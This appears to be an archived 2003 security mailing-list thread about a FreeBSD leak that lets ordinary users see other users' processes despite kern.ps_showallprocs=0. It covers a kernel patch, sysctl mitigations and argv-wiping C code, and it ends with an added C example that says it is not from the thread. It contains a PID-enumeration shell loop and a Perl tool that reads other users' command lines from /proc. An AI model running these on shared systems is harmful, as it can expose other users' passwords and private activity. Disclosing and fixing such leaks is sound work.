
View Full Version : ps information leak in FreeBSD



Cache
07/01/03, 00:34
Nothing special, lame :)

Hi,

0x01 About
0x02 Practical
0x03 Conclusion
0x04 Install
0x05 End
0x06 Greetz

0x01 About:

Author: Rafael Lesniak / 05012003 Hannover / cache@irc.pl
Sorry for my English

All files are at:
http://www.sowatech.com.pl/cache/soft/proc-patch.tar.gz

This is a little information leak. This bug(?) is not dangerous, but a
normal user can see all processes on the box using e.g. /bin/ps;

Affected Systems:
FreeBSD: possibly all
OpenBSD: don't know
Linux: don't know
Other: don't know

0x02 Practical:

(I don't use /proc.)

Last login: Sun Jan 5 00:13:01 on ttyv0
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 4.7-RELEASE (SILENT) #1: Sun Jan 5 00:10:51 GMT 2003

Welcome to FreeBSD!

[cache@silent][ttyv1] ~> grep "FreeBSD:" /usr/src/sys/i386/conf/LINT
# $FreeBSD: src/sys/i386/conf/LINT,v 1.749.2.124 2002/10/05 18:31:47 scottl Exp

[cache@silent][ttyv1] ~> sysctl -a | grep show
kern.ps_showallprocs: 0
[cache@silent][ttyv1] ~> ps -auxwwwp 101
USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
root 101 0,0 0,2 1020 740 ?? Is 0:12 0:00,01 /usr/sbin/cron

ps [-aCcefhjlmrSTuvwx] [-M core] [-N system] [-O fmt] [-o fmt] [-p pid]
[-t tty] [-U username]

-p Display information associated with the specified process ID.

--- cut ---

0x03 Conclusion:

I hope it is a good idea to protect all process information
(anyway, what do we need kern.ps_showallprocs for?)

[cache@silent][ttyv1] ~> cat info.sh
#!/bin/sh
# Ask ps about every PID in turn: with kern.ps_showallprocs=0 the -p
# lookup still answers for other users' processes. The loop stops at
# 99999, the largest PID FreeBSD hands out, instead of running forever.
pid=0
while [ "$pid" -le 99999 ]; do
    /bin/ps -auxwwwp "$pid" | /usr/bin/grep "$pid"
    pid=$((pid + 1))
done

--- cut ---

See out.log for how it works.

0x04 Install:

$ mkdir /tmp/patch
$ cp proc-patch.tar.gz /tmp/patch
$ cd /tmp/patch
$ tar -zxvf proc-patch.tar.gz
$ su
# patch -p0 < proc.patch

--- cut ---
....
--------------------------
|*** /usr/src/sys/kern/kern_proc.c Tue May 1 13:39:06 2001
|--- /usr/src/sys/kern/kern_proc.c Sun Jan 5 00:18:40 2003
--------------------------
Patching file /usr/src/sys/kern/kern_proc.c using Plan A...
Hunk #1 succeeded at 453.
done
--- cut ---

Configure your kernel, compile, install and that's all.

0x05 End:

I have made this little patch for my FreeBSD box, and this method
doesn't work any more. Maybe it is possible to do, but this is not my
skill level );] ...

0x06 Greetz:
kador, Lam3rz, layon, ultor, neutrinka, !pl-bsd, and
all lamerz ...

## Rafal (cache) Lesniak #######
CoSysOp cache /at/ sowatech.com.pl
### http://www.sowatech.com.pl ###

Sean Kelly
07/01/03, 04:36

On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> [cache@silent][ttyv1] ~> sysctl -a | grep show
> kern.ps_showallprocs: 0
> [cache@silent][ttyv1] ~> ps -auxwwwp 101
> USER PID %CPU %MEM VSZ RSS TT STAT STARTED TIME COMMAND
> root 101 0,0 0,2 1020 740 ?? Is 0:12 0:00,01 /usr/sbin/cron

I've been aware of this problem for a long time, and in fact I made a patch
against 4.6-STABLE which can be applied to correct it. I am not sure how
portable it will be to 4.7-STABLE, but I imagine it would work.

Please see the relevant FreeBSD PR:
http://www.FreeBSD.org/cgi/query-pr.cgi?pr=kern/42065

-- 
Sean Kelly | PGP KeyID: D2E5E296
smkelly@zombie.org | http://www.zombie.org


Sean Kelly
08/01/03, 23:58

On Tue, Jan 07, 2003 at 09:18:00AM +0000, Jez Hancock wrote:
...
> It's annoying in that I see a lot of users running mysql with the -u and -p options:
>
> mysql -u user -p mypassword
>
> on the commandline, thinking that this info will not show up in ps listings when ps
> is run by other users. Ho hum...

As has already been pointed out, this is something that the application
should deal with. Despite this, FreeBSD also has a sysctl knob which will
protect against this.

(2) root:~$ sysctl kern.ps_argsopen=0
kern.ps_argsopen: 1 -> 0

This will prevent exactly the problem you describe, by making arguments not
viewable to other users (excluding root). It also appears to take effect in
/proc, such as /proc/<pid>/cmdline.

This is present in FreeBSD 4.7-STABLE, at least.

-- 
Sean Kelly | PGP KeyID: D2E5E296
smkelly@zombie.org | http://www.zombie.org


Damien Miller
09/01/03, 22:25
Crist J. Clark wrote:
> Any program that asks for a password on the command line should have
> the common decency to overwrite/obfuscate it, along the lines of,
>
> case 'p':
> passwd = optarg;
> optarg = "********";
> break;
>
> So that it doesn't show up in any "ps" output.

That works only for OSs which support argv clobbering - it is by no
means portable and shouldn't be depended on for security.

-d

David M. Wilson
15/01/03, 22:51
On Thu, Jan 09, 2003 at 02:48:30PM +1100, Damien Miller wrote:

> Crist J. Clark wrote:

> >Any program that asks for a password on the command line should have
> >the common decency to overwrite/obfuscate it, along the lines of,

> > case 'p':
> > passwd = optarg;
> > optarg = "********";
> > break;

This code is incorrect, it destroys a temporary pointer that will be
overwritten with the next call to getopt(). For the sake of
completeness, it should be noted that to actually destroy the command
line argument data, one should do something along the lines of:

case 'p':
    passwd = strdup(optarg);        /* private copy; now requires free()ing. */
    {
        size_t len = strlen(optarg), i;
        for (i = 0; i != len; ++i)
            optarg[i] = 0;          /* zero the argv bytes themselves, not the pointer */
    }
    break;

> That works only for OSs which support argv clobbering - it is by no
> means portable and shouldn't be depended on for security.

This is still correct though. :). Any passwords passed on the command
line are available through a race anyway. Just don't do it(tm).

David.

Jez Hancock
21/01/03, 06:38
On Sun, Jan 05, 2003 at 08:46:50PM +0000, Cache wrote:
> This is a little information leak. This bug(?) is not dangerous, but
> normal user can see all process on the box using ex. /bin/ps;
This topic was addressed on freebsd-security list a while back, where
someone also noted that all user process information can be obtained
by regular users even with the sysctl flag 'kern.ps_showallprocs' set simply
by looking at the contents of /proc. The following script was also
posted by someone to demonstrate this:

#!/usr/bin/perl
#
# hhp-sap_evade.pl ([s]how[a]ll[p]rocs) 02/03/2002
# author: JohnnyB
#
# a very basic tool that breaches the FreeBSD sysctl kern.ps_showallprocs=0
# option; an option that hides other users process information.
# (why would they implement such a broken and easily evaded option?)
# [and no this didnt take any skill. its basically an output format]
#
# Tested on FreeBSD 4.5-RC.

print "[USER] [GROUP] [PID] [FILE/ARGS]\n";
opendir(DIR,"/proc");
@procs=readdir(DIR);
closedir(DIR);
foreach ${proc} (@procs){
if(${proc}=~/[0-9]/o){
unshift(@pids, ${proc});
}
}
foreach $pid (@pids){
open(FD, "ls -al /proc/$pid/file|");
while(<FD>){
chomp;
${l}=$_;
${l}=~s/\s{1,}/ /g;
if(${l}=~/.*? 1 (\S+) (\S+) .*?\/proc\/${pid}\/file -> (\S+)/){
&ppid(${1},${2},${pid},${3});
}
}
close(FD);
}
exit(0);

sub ppid {
(${a},${b},${c},${d})=@_;
undef(${str});
undef(${line});
if(-e "/proc/$c/cmdline"){
open(heh,"cat /proc/$c/cmdline|");
@hah=<heh>;
@chars=split(//,$hah[0]);
foreach ${chr} (@chars){
if(${chr}=~/[^a-zA-Z0-9\-_=\.\/\@\(\):\$#!&\*\+\|\"\'\;\[\]<>\?~`\^]/o){
${str}.=" ";
}else{
${str}.=${chr};
}
}
${line}.=${a};
while(length(${line})<11){${line}.=" ";} #alignment...
${line}.=" ".${b};
while(length(${line})<23){${line}.=" ";}
${line}.=" ".${c};
while(length(${line})<31){${line}.=" ";}
chop(${str});
if(${d}eq"unknown"){
${str}=~s/\s{1,}//g;
${line}.=" ("."${str}".")";
}else{
${line}.=" "."${str}";
}
@line=split(//,${line});
if(length(${line})>80){
${cntr}=0;
foreach ${char} (@line){
if((${cntr}==80)||(${cntr}==128)||(${cntr}==176)|| (${cntr}==234)){
print "\n"." "x32; #^Anything >, deal with the rollover.
}
print "${char}";
${cntr}++;
}
print "\n";
}
else{
print "${line}\n";
}
return(0);
}
}

I believe someone (last poster in this thread?) also posted a patch on the same
list, freebsd-security.

It's annoying in that I see a lot of users running mysql with the -u and -p options:

mysql -u user -p mypassword

on the commandline, thinking that this info will not show up in ps listings when ps
is run by other users. Ho hum...

Regards,

Jez Hancock

Crist J. Clark
21/01/03, 09:12
On Tue, Jan 07, 2003 at 09:18:00AM +0000, Jez Hancock wrote:
[snip]

> It's annoying in that I see a lot of users running mysql with the -u and -p options:
>
> mysql -u user -p mypassword
>
> on the commandline, thinking that this info will not show up in ps listings when ps
> is run by other users. Ho hum...

Any program that asks for a password on the command line should have
the common decency to overwrite/obfuscate it, along the lines of,

case 'p':
passwd = optarg;
optarg = "********";
break;

So that it doesn't show up in any "ps" output.

Of course, there is still a window of vulnerability before the code is
executed, but any long-lived daemon has no excuse for not doing this.
--
Crist J. Clark | cjclark@alum.mit.edu
| cjclark@jhu.edu
http://people.freebsd.org/~cjc/ | cjc@freebsd.org
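As an added example (not code from any post in this thread), this is Crist's `case 'p'` with David's copy-then-wipe fix, placed in a complete getopt() loop and run against a constructed mysql-style argv; it assumes a POSIX getopt() and, as Damien points out, only helps on systems whose ps reads the live argv memory, and it does nothing about the window before the wipe runs.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Zero an argv cell through a volatile pointer so the compiler cannot drop the stores. */
static void wipe_arg(char *arg)
{
    volatile char *p = arg;
    while (*p != '\0')
        *p++ = '\0';
}

/* Parse "-u user -p password" as in the thread's mysql example: strdup() the
 * password first, then wipe its argv cell. Returns 0, or -1 on error. */
int parse_args(int argc, char **argv, char **passwd_out)
{
    int c;
    *passwd_out = NULL;
    optind = 1;                 /* make repeated calls in one process safe */
    while ((c = getopt(argc, argv, "u:p:")) != -1) {
        switch (c) {
        case 'u': break;        /* user name is not secret */
        case 'p':
            *passwd_out = strdup(optarg);   /* caller must free() this copy */
            if (*passwd_out == NULL)
                return -1;
            wipe_arg(optarg);   /* the bytes ps would have shown are now 0 */
            break;
        default:
            return -1;
        }
    }
    return 0;
}

/* Constructed argv (not a real process): 1 if the program kept the password and the argv cell is all zeros. */
int demo_mysql_args(void)
{
    char a0[] = "mysql", a1[] = "-u", a2[] = "user", a3[] = "-p";
    char a4[] = "mypassword";
    char *argv[] = { a0, a1, a2, a3, a4, NULL };
    char *pw; size_t i;
    int ok = parse_args(5, argv, &pw) == 0 && pw && !strcmp(pw, "mypassword");
    for (i = 0; ok && i < sizeof a4; i++)
        ok = a4[i] == '\0';
    free(pw);
    return ok;
}
```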